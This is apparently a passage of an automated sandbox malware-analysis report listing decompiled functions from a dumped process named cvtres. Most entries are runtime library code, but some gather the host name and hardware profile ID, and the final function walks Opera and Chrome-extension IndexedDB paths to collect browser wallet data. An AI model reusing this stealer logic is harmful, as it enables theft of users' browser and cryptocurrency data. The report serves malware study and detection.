                                                                      • Part of subcall function 0041D1C9: std::ios_base::_Tidy.LIBCPMT ref: 0041D1EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3$_memmovestd::ios_base::_$H_prolog3_H_prolog3_catchIos_base_dtorTidy
                                                                    • String ID: trA
                                                                    • API String ID: 4143508521-2959832044
                                                                    • Opcode ID: 30ca70afd20bbe590cd1f8f9cc94e7f33500932e757459f2e5cbab7673d55999
                                                                    • Instruction ID: f715c83aafc18979119b293aecec44ea6145d550c90bea030c81f590c4195d75
                                                                    • Opcode Fuzzy Hash: 30ca70afd20bbe590cd1f8f9cc94e7f33500932e757459f2e5cbab7673d55999
                                                                    • Instruction Fuzzy Hash: 5F31D9B1901159AFCB10EF99DA45BCDBBF4AB18308F5090ABE609A7251C7789A88CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 531 4044a3-4044ab 532 4044b7-4044bc 531->532 533 4044ad-4044b2 call 41cfa0 531->533 535 4044c9-4044cf 532->535 536 4044be-4044c2 call 4045b4 532->536 533->532 538 4044d1-4044d4 535->538 539 4044e9-4044eb 535->539 542 4044c7 536->542 538->539 543 4044d6-4044db 538->543 540 4044f9-404502 539->540 541 4044ed-4044f3 539->541 544 4044f5 541->544 545 4044f7 541->545 542->540 546 4044dd 543->546 547 4044df-4044e7 call 404354 543->547 544->545 545->540 546->547 547->540
                                                                    C-Code - Quality: 89%
                                                                    			E004044A3(void* __ebx, char* __ecx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                    				void* __esi;
                                                                    				intOrPtr _t7;
                                                                    				intOrPtr _t10;
                                                                    				void* _t14;
                                                                    				char* _t15;
                                                                    				void* _t17;
                                                                    				intOrPtr _t18;
                                                                    
                                                                    				_t17 = __edi;
                                                                    				_t15 = __ecx;
                                                                    				_t14 = __ebx;
                                                                    				_t18 = _a4;
                                                                    				if(_t18 > 0xfffffffe) {
                                                                    					E0041CFA0("string too long");
                                                                    				}
                                                                    				_t7 =  *((intOrPtr*)(_t15 + 0x14));
                                                                    				_t21 = _t7 - _t18;
                                                                    				if(_t7 >= _t18) {
                                                                    					__eflags = _a8;
                                                                    					if(_a8 == 0) {
                                                                    						L9:
                                                                    						__eflags = _t18;
                                                                    						if(_t18 == 0) {
                                                                    							 *((intOrPtr*)(_t15 + 0x10)) = 0;
                                                                    							__eflags = _t7 - 0x10;
                                                                    							if(_t7 >= 0x10) {
                                                                    								_t15 =  *_t15;
                                                                    							}
                                                                    							 *_t15 = 0;
                                                                    						}
                                                                    						goto L13;
                                                                    					}
                                                                    					__eflags = _t18 - 0x10;
                                                                    					if(_t18 >= 0x10) {
                                                                    						goto L9;
                                                                    					}
                                                                    					_t10 =  *((intOrPtr*)(_t15 + 0x10));
                                                                    					__eflags = _t18 - _t10;
                                                                    					if(_t18 < _t10) {
                                                                    						_t10 = _t18;
                                                                    					}
                                                                    					E00404354(_t15, 1, _t10);
                                                                    					goto L13;
                                                                    				} else {
                                                                    					_push( *((intOrPtr*)(_t15 + 0x10)));
                                                                    					_push(_t18); // executed
                                                                    					E004045B4(_t14, _t15, _t17, _t18, _t21); // executed
                                                                    					L13:
                                                                    					asm("sbb eax, eax");
                                                                    					return  ~0x00000000;
                                                                    				}
                                                                    			}











                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004044B2
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFB5
                                                                      • Part of subcall function 0041CFA0: __CxxThrowException@8.LIBCMT ref: 0041CFCA
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 1823113695-2556327735
                                                                    • Opcode ID: 4339d4739821b1082f0794efc13e54746ce7590e2edae6a30565f95cf582e64e
                                                                    • Instruction ID: a64d84633e6199b04779e256df1ccb8a3a02977fafbb8fb7b7b785ce5c65a4e8
                                                                    • Opcode Fuzzy Hash: 4339d4739821b1082f0794efc13e54746ce7590e2edae6a30565f95cf582e64e
                                                                    • Instruction Fuzzy Hash: 8FF0FCF15041205ADB14A52D4D80B6A36415BD23187318D7BE6A1FF1C2C23DDC8297DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 550 415326-41535c GetCurrentHwProfileA 551 415364 550->551 552 41535e-415362 550->552 553 415369-41537c call 404331 call 41da9b 551->553 552->553
                                                                    C-Code - Quality: 58%
                                                                    			E00415326(intOrPtr __edi, intOrPtr __esi) {
                                                                    				signed int _v8;
                                                                    				struct tagHW_PROFILE_INFOA _v132;
                                                                    				char _v136;
                                                                    				void* __ebx;
                                                                    				signed int _t8;
                                                                    				int _t11;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t20;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t22;
                                                                    				signed int _t23;
                                                                    
                                                                    				_t22 = __esi;
                                                                    				_t21 = __edi;
                                                                    				_t8 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t8 ^ _t23;
                                                                    				_v136 = 0;
                                                                    				_t11 = GetCurrentHwProfileA( &_v132); // executed
                                                                    				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
                                                                    				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                    				_t17 = __esi;
                                                                    				 *((char*)(__esi)) = 0;
                                                                    				if(_t11 == 0) {
                                                                    					_push("Unknown");
                                                                    				} else {
                                                                    					_push( &(_v132.szHwProfileGuid));
                                                                    				}
                                                                    				E00404331(_t17);
                                                                    				return E0041DA9B(_t22, 0, _v8 ^ _t23, _t20, _t21, _t22);
                                                                    			}















                                                                    APIs
                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00415346
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProfile
                                                                    • String ID: Unknown
                                                                    • API String ID: 2104809126-1654365787
                                                                    • Opcode ID: 0c66456ff8185383b4ab4bdc4e19eec4a2b126090d89557c0130162dc813b6f4
                                                                    • Instruction ID: 0b7ba2daec30cbe8b273c448aad063ea9bd48d5a3dadf71705b7cee10d14c942
                                                                    • Opcode Fuzzy Hash: 0c66456ff8185383b4ab4bdc4e19eec4a2b126090d89557c0130162dc813b6f4
                                                                    • Instruction Fuzzy Hash: A7F08970A00709DFDB20DFB9D88169EB7F8BF08744F90057E9552D7241DB749A488755
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 558 41522a-415266 call 42e300 GetComputerNameA 561 415268 558->561 562 41526e-415279 call 41da9b 558->562 561->562
                                                                    C-Code - Quality: 87%
                                                                    			E0041522A(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
                                                                    				signed int _v8;
                                                                    				char _v32776;
                                                                    				long _v32780;
                                                                    				signed int _t9;
                                                                    				int _t13;
                                                                    				char* _t14;
                                                                    				intOrPtr _t16;
                                                                    				intOrPtr _t19;
                                                                    				intOrPtr _t20;
                                                                    				intOrPtr _t21;
                                                                    				signed int _t22;
                                                                    
                                                                    				_t21 = __esi;
                                                                    				_t20 = __edi;
                                                                    				_t19 = __edx;
                                                                    				_t16 = __ebx;
                                                                    				E0042E300(0x8008);
                                                                    				_t9 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t9 ^ _t22;
                                                                    				_v32780 = 0x7fff;
                                                                    				_t13 = GetComputerNameA( &_v32776,  &_v32780); // executed
                                                                    				_t14 = "Unknown";
                                                                    				if(_t13 != 0) {
                                                                    					_t14 =  &_v32776;
                                                                    				}
                                                                    				return E0041DA9B(_t14, _t16, _v8 ^ _t22, _t19, _t20, _t21);
                                                                    			}















                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerName
                                                                    • String ID: Unknown
                                                                    • API String ID: 3545744682-1654365787
                                                                    • Opcode ID: 731efd92db05fb85d45fabfc2e226234412909ee37f594d9104a00228a7c78be
                                                                    • Instruction ID: b772a0c3d20c8b889ad153f22bf8f6b2093c241ca24dfb85f84957339cd0868e
                                                                    • Opcode Fuzzy Hash: 731efd92db05fb85d45fabfc2e226234412909ee37f594d9104a00228a7c78be
                                                                    • Instruction Fuzzy Hash: 63E0C075A001189AC790DF59DD456CA73E8BB18708F4080B6A549D3241DE34AA4C4F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E004045B4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t30;
                                                                    				signed int _t32;
                                                                    				signed int _t34;
                                                                    				signed int _t39;
                                                                    				intOrPtr _t40;
                                                                    				unsigned int _t42;
                                                                    				unsigned int _t48;
                                                                    				signed int _t51;
                                                                    				signed int _t53;
                                                                    				void* _t54;
                                                                    
                                                                    				_push(0xc);
                                                                    				E00420808(E0043396F, __ebx, __edi, __esi);
                                                                    				_t53 = __ecx;
                                                                    				 *((intOrPtr*)(_t54 - 0x18)) = __ecx;
                                                                    				_t51 =  *(_t54 + 8) | 0x0000000f;
                                                                    				if(_t51 <= 0xfffffffe) {
                                                                    					_t39 = 3;
                                                                    					_t42 =  *(__ecx + 0x14);
                                                                    					 *(_t54 - 0x14) = _t42;
                                                                    					 *(_t54 - 0x14) =  *(_t54 - 0x14) >> 1;
                                                                    					_t48 =  *(_t54 - 0x14);
                                                                    					if(_t48 > _t51 / _t39) {
                                                                    						_t51 = 0xfffffffe;
                                                                    						if(_t42 <= _t51 - _t48) {
                                                                    							_t51 = _t48 + _t42;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t51 =  *(_t54 + 8);
                                                                    				}
                                                                    				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                    				_t16 = _t51 + 1; // 0xff
                                                                    				_push(0);
                                                                    				_t30 = E00404719(_t51, _t53, _t16); // executed
                                                                    				 *(_t54 + 8) = _t30;
                                                                    				_t40 =  *((intOrPtr*)(_t54 + 0xc));
                                                                    				if(_t40 != 0) {
                                                                    					if( *(_t53 + 0x14) < 0x10) {
                                                                    						_t34 = _t53;
                                                                    					} else {
                                                                    						_t34 =  *_t53;
                                                                    					}
                                                                    					E00420090( *(_t54 + 8), _t34, _t40);
                                                                    				}
                                                                    				E00404354(_t53, 1, 0);
                                                                    				_t32 =  *(_t54 + 8);
                                                                    				 *_t53 = _t32;
                                                                    				 *(_t53 + 0x14) = _t51;
                                                                    				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
                                                                    				if(_t51 < 0x10) {
                                                                    					_t32 = _t53;
                                                                    				}
                                                                    				 *((char*)(_t32 + _t40)) = 0;
                                                                    				return E00420874(_t32);
                                                                    			}














                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_catch_memmove
                                                                    • String ID:
                                                                    • API String ID: 3914490576-0
                                                                    • Opcode ID: 74f846dde16a26c75c1759dd4fb3cc2c5c58cd99a23e281b715338a03c4c37df
                                                                    • Instruction ID: b1c328258c057c5c2ebea97da91468bdd080ee36fc5cdf3542bc99f7bb980364
                                                                    • Opcode Fuzzy Hash: 74f846dde16a26c75c1759dd4fb3cc2c5c58cd99a23e281b715338a03c4c37df
                                                                    • Instruction Fuzzy Hash: 611127B0B00204AFDB24DF58D84071E77A2BBC0310F20453FE605AB2C1D779AE418B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			E0041462B(void* __esi, void* __ebp, void* __eflags, intOrPtr _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				char _t20;
                                                                    				intOrPtr _t22;
                                                                    				void* _t25;
                                                                    				intOrPtr* _t26;
                                                                    				void* _t29;
                                                                    				void* _t31;
                                                                    
                                                                    				_t31 = __esi;
                                                                    				 *((intOrPtr*)(__esi + 0x30)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
                                                                    				 *((intOrPtr*)(__esi + 0x18)) = 6;
                                                                    				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x20)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x24)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x28)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0xc)) = 0;
                                                                    				_t26 = E0041E24D(_t25, _t29, 0, __esi, __eflags, 4);
                                                                    				_pop(_t27);
                                                                    				_t34 = _t26;
                                                                    				if(_t26 == 0) {
                                                                    					_t26 = 0;
                                                                    					__eflags = 0;
                                                                    				} else {
                                                                    					_t22 = E0041D4D4(_t26, 0, __esi, _t34); // executed
                                                                    					 *_t26 = _t22;
                                                                    					_t27 = E0041D293();
                                                                    					E0040E094(_t23);
                                                                    				}
                                                                    				_push(0x20);
                                                                    				_push(_t31);
                                                                    				 *((intOrPtr*)(_t31 + 0x30)) = _t26;
                                                                    				 *((intOrPtr*)(_t31 + 0x38)) = _a8;
                                                                    				 *((intOrPtr*)(_t31 + 0x3c)) = 0;
                                                                    				_t20 = E00414754(_t26, _t27, 0, _t31, _t34);
                                                                    				 *((char*)(_t31 + 0x40)) = _t20;
                                                                    				if( *((intOrPtr*)(_t31 + 0x38)) == 0) {
                                                                    					return E00413809(4, 0);
                                                                    				}
                                                                    				return _t20;
                                                                    			}












                                                                    APIs
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    • std::locale::_Init.LIBCPMT ref: 00414666
                                                                      • Part of subcall function 0041D4D4: __EH_prolog3.LIBCMT ref: 0041D4DB
                                                                      • Part of subcall function 0041D4D4: std::_Lockit::_Lockit.LIBCPMT ref: 0041D4F1
                                                                      • Part of subcall function 0041D4D4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041D513
                                                                      • Part of subcall function 0041D4D4: std::locale::_Setgloballocale.LIBCPMT ref: 0041D51D
                                                                      • Part of subcall function 0041D4D4: _Yarn.LIBCPMT ref: 0041D533
                                                                      • Part of subcall function 0041D4D4: std::locale::facet::_Incref.LIBCPMT ref: 0041D540
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 00414674
                                                                      • Part of subcall function 0040E094: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
                                                                    • String ID:
                                                                    • API String ID: 3761783024-0
                                                                    • Opcode ID: 39ac80b550bc547a8a91c4c97be01d75f8c8b00af7629e6db42e1b2b098ecbed
                                                                    • Instruction ID: 7a89e206c441c014fb0b50ba116f65a7f208eff19dc693b985901f760cf22b35
                                                                    • Opcode Fuzzy Hash: 39ac80b550bc547a8a91c4c97be01d75f8c8b00af7629e6db42e1b2b098ecbed
                                                                    • Instruction Fuzzy Hash: 09014CB0900B408FC730DF6B8181657FBF8BFE5718B10492FE29686A51D7B9A085CF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00404719(void* __edi, void* __esi, signed int _a4) {
                                                                    				char _v16;
                                                                    				void* _t10;
                                                                    				void* _t15;
                                                                    				void* _t18;
                                                                    
                                                                    				_t10 = 0;
                                                                    				if(_a4 > 0) {
                                                                    					_t24 = _a4 - 0xffffffff;
                                                                    					if(_a4 > 0xffffffff) {
                                                                    						L3:
                                                                    						_a4 = _a4 & 0x00000000;
                                                                    						E0041DC00( &_v16,  &_a4);
                                                                    						_v16 = 0x435264;
                                                                    						return E0041FF86( &_v16, 0x440c30);
                                                                    					}
                                                                    					_t10 = E0041E24D(_t15, _t18, __edi, __esi, _t24, _a4); // executed
                                                                    					if(0 == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				return _t10;
                                                                    			}








                                                                    APIs
                                                                    • std::exception::exception.LIBCMT ref: 00404744
                                                                    • __CxxThrowException@8.LIBCMT ref: 00404759
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 4063778783-0
                                                                    • Opcode ID: 40c23939a32ff9c93c430c1e1bd220817e59737d2c66f8ab58fb27e12c73c030
                                                                    • Instruction ID: 10167cedd26b8403dd0ff800c48bbb355951d6bbe9f68e06b7cf2e3c94d28917
                                                                    • Opcode Fuzzy Hash: 40c23939a32ff9c93c430c1e1bd220817e59737d2c66f8ab58fb27e12c73c030
                                                                    • Instruction Fuzzy Hash: 72E065B5810209AACF10FF61C8416CE77A89B01399F20C27BA924991C0E7B89684CAD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0042637A(signed int _a4, signed int _a8, long _a12) {
                                                                    				void* _t10;
                                                                    				long _t11;
                                                                    				long _t12;
                                                                    				signed int _t13;
                                                                    				signed int _t17;
                                                                    				long _t19;
                                                                    				long _t24;
                                                                    
                                                                    				_t17 = _a4;
                                                                    				if(_t17 == 0) {
                                                                    					L3:
                                                                    					_t24 = _t17 * _a8;
                                                                    					__eflags = _t24;
                                                                    					if(_t24 == 0) {
                                                                    						_t24 = _t24 + 1;
                                                                    						__eflags = _t24;
                                                                    					}
                                                                    					goto L5;
                                                                    					L6:
                                                                    					_t10 = RtlAllocateHeap( *0x445024, 8, _t24); // executed
                                                                    					__eflags = 0;
                                                                    					if(0 == 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					L14:
                                                                    					return _t10;
                                                                    					goto L15;
                                                                    					L7:
                                                                    					__eflags =  *0x44568c;
                                                                    					if( *0x44568c == 0) {
                                                                    						_t19 = _a12;
                                                                    						__eflags = _t19;
                                                                    						if(_t19 != 0) {
                                                                    							 *_t19 = 0xc;
                                                                    						}
                                                                    					} else {
                                                                    						_t11 = E004235E2(_t10, _t24);
                                                                    						__eflags = _t11;
                                                                    						if(_t11 != 0) {
                                                                    							L5:
                                                                    							_t10 = 0;
                                                                    							__eflags = _t24 - 0xffffffe0;
                                                                    							if(_t24 > 0xffffffe0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								goto L6;
                                                                    							}
                                                                    						} else {
                                                                    							_t12 = _a12;
                                                                    							__eflags = _t12;
                                                                    							if(_t12 != 0) {
                                                                    								 *_t12 = 0xc;
                                                                    							}
                                                                    							_t10 = 0;
                                                                    						}
                                                                    					}
                                                                    					goto L14;
                                                                    				} else {
                                                                    					_t13 = 0xffffffe0;
                                                                    					_t27 = _t13 / _t17 - _a8;
                                                                    					if(_t13 / _t17 >= _a8) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						 *((intOrPtr*)(E00422147(_t27))) = 0xc;
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    				L15:
                                                                    			}











                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042202F,?,?,00000000,00000000,00000000,?,00425EB7,00000001,00000214), ref: 004263BD
                                                                      • Part of subcall function 00422147: __getptd_noexit.LIBCMT ref: 00422147
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    • Opcode ID: 0fe13994f006a54bff521e25f3763a03e4fe7c3eb7dc9fea1d87e76d178cba2e
                                                                    • Instruction ID: 4f76a42a0505025759db027c3360814d080dc93807ba604e5b2e7a593e419657
                                                                    • Opcode Fuzzy Hash: 0fe13994f006a54bff521e25f3763a03e4fe7c3eb7dc9fea1d87e76d178cba2e
                                                                    • Instruction Fuzzy Hash: 3D019E353016259BEF29DF26FC54B6B37A4AF81360F82452FAC15CA2D0CB78DC00C658
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,0042D5A2,00445060,00000314,00000000,?,?,?,?,?,00423528,00445060,Microsoft Visual C++ Runtime Library,00012010), ref: 00425D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 42f16e99ded79a027ddd52576ae94823c66623e09604ede38b158fe54899fdd1
                                                                    • Instruction ID: d22a02c070d247f09f8bde68d63d1fe7ae76c8fa75cbefed771409745bc97bea
                                                                    • Opcode Fuzzy Hash: 42f16e99ded79a027ddd52576ae94823c66623e09604ede38b158fe54899fdd1
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E0041208D(CHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v804;
                                                                    				char _v1068;
                                                                    				char _v1332;
                                                                    				char _v1596;
                                                                    				char _v1860;
                                                                    				char _v2124;
                                                                    				struct _WIN32_FIND_DATAA _v2444;
                                                                    				intOrPtr _v2448;
                                                                    				intOrPtr _v2452;
                                                                    				intOrPtr _v2456;
                                                                    				CHAR* _v2460;
                                                                    				intOrPtr _v2464;
                                                                    				void* _v2468;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t122;
                                                                    				void* _t132;
                                                                    				signed char _t154;
                                                                    				signed char _t156;
                                                                    				int _t158;
                                                                    				signed char _t213;
                                                                    				signed char _t218;
                                                                    				signed char _t223;
                                                                    				CHAR* _t241;
                                                                    				CHAR* _t242;
                                                                    				signed int _t243;
                                                                    				void* _t244;
                                                                    				void* _t245;
                                                                    				void* _t251;
                                                                    
                                                                    				_t240 = __edx;
                                                                    				_t122 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t122 ^ _t243;
                                                                    				_v2448 = _a4;
                                                                    				_v2456 = _a8;
                                                                    				_t227 = __edx;
                                                                    				_v2452 = _a12;
                                                                    				_t242 = __ecx;
                                                                    				_v2460 = __ecx;
                                                                    				_v2464 = __edx;
                                                                    				wsprintfA( &_v2124, "%s\\*.*", __edx);
                                                                    				_t245 = _t244 + 0xc;
                                                                    				if(_a20 != 0) {
                                                                    					E00426300( &_v276, 0, 0x104);
                                                                    					_t132 = _a20 - 1;
                                                                    					if(_t132 == 0) {
                                                                    						_push("Opera Stable");
                                                                    						L24:
                                                                    						lstrcatA( &_v276, ??);
                                                                    						L25:
                                                                    						_t241 = "%s\\%s\\%s\\%s";
                                                                    						wsprintfA( &_v1860, _t241, _t227,  &_v276,  *0x445fd4, _t242);
                                                                    						_t242 = "%s\\%s";
                                                                    						wsprintfA( &_v1596, _t242,  &_v1860,  *0x445a8c);
                                                                    						wsprintfA( &_v1332, _t241, _t227,  &_v276,  *0x445e54, _v2460);
                                                                    						wsprintfA( &_v804, _t242,  &_v1332,  *0x445a8c);
                                                                    						wsprintfA( &_v1068, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t227,  &_v276,  *0x445b64, _v2460);
                                                                    						wsprintfA( &_v540, _t242,  &_v1068,  *0x445a8c);
                                                                    						_t154 = GetFileAttributesA( &_v1596);
                                                                    						if(_t154 != 0xffffffff && (_t154 & 0x00000010) == 0) {
                                                                    							_t227 = _v2448;
                                                                    							E00411DA6(_v2448, _v2456, _t240,  &_v1860, _v2452,  &_v276, _a16, 1);
                                                                    						}
                                                                    						_t156 = GetFileAttributesA( &_v804);
                                                                    						if(_t156 != 0xffffffff && (_t156 & 0x00000010) == 0) {
                                                                    							_t227 = _v2448;
                                                                    							E00411DA6(_v2448, _v2456, _t240,  &_v1332, _v2452,  &_v276, _a16, 2);
                                                                    						}
                                                                    						_t158 = GetFileAttributesA( &_v540);
                                                                    						if(_t158 != 0xffffffff && (_t158 & 0x00000010) == 0) {
                                                                    							_t227 = _v2448;
                                                                    							_t158 = E00411DA6(_v2448, _v2456, _t240,  &_v1068, _v2452,  &_v276, _a16, 3);
                                                                    						}
                                                                    						L34:
                                                                    						return E0041DA9B(_t158, _t227, _v8 ^ _t243, _t240, _t241, _t242);
                                                                    					}
                                                                    					if(_t132 != 1) {
                                                                    						goto L25;
                                                                    					}
                                                                    					_push("Opera GX Stable");
                                                                    					goto L24;
                                                                    				}
                                                                    				_t158 = FindFirstFileA( &_v2124,  &_v2444);
                                                                    				_v2468 = _t158;
                                                                    				if(_t158 != 0xffffffff) {
                                                                    					_t241 = "%s\\%s\\%s\\%s";
                                                                    					_t242 = "%s\\%s";
                                                                    					do {
                                                                    						_push(".");
                                                                    						_push( &(_v2444.cFileName));
                                                                    						if( *0x446458() == 0) {
                                                                    							goto L18;
                                                                    						}
                                                                    						_push("..");
                                                                    						_push( &(_v2444.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_t227 = 0x104;
                                                                    							E00426300( &_v276, 0, 0x104);
                                                                    							lstrcatA( &_v276,  &(_v2444.cFileName));
                                                                    							wsprintfA( &_v540, _t241, _v2464,  &_v276,  *0x445fd4, _v2460);
                                                                    							wsprintfA( &_v1068, _t242,  &_v540,  *0x445a8c);
                                                                    							wsprintfA( &_v804, _t241, _v2464,  &_v276,  *0x445e54, _v2460);
                                                                    							wsprintfA( &_v1332, _t242,  &_v804,  *0x445a8c);
                                                                    							wsprintfA( &_v1596, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _v2464,  &_v276,  *0x445b64, _v2460);
                                                                    							wsprintfA( &_v1860, _t242,  &_v1596,  *0x445a8c);
                                                                    							_t251 = _t245 + 0x84;
                                                                    							if(_a24 != 0) {
                                                                    								_t223 = GetFileAttributesA( &_v1068);
                                                                    								if(_t223 != 0xffffffff && (_t223 & 0x00000010) == 0) {
                                                                    									E00411DA6(_v2448, _v2456, _t240,  &_v540, _v2452,  &_v276, _a16, 1);
                                                                    									_t227 = 0x104;
                                                                    								}
                                                                    							}
                                                                    							if(_a28 != 0) {
                                                                    								_t218 = GetFileAttributesA( &_v1332);
                                                                    								if(_t218 != 0xffffffff && (_t218 & 0x00000010) == 0) {
                                                                    									E00411DA6(_v2448, _v2456, _t240,  &_v804, _v2452,  &_v276, _a16, 2);
                                                                    									_t227 = 0x104;
                                                                    								}
                                                                    							}
                                                                    							if(_a32 != 0) {
                                                                    								_t213 = GetFileAttributesA( &_v1860);
                                                                    								if(_t213 != 0xffffffff && (_t213 & 0x00000010) == 0) {
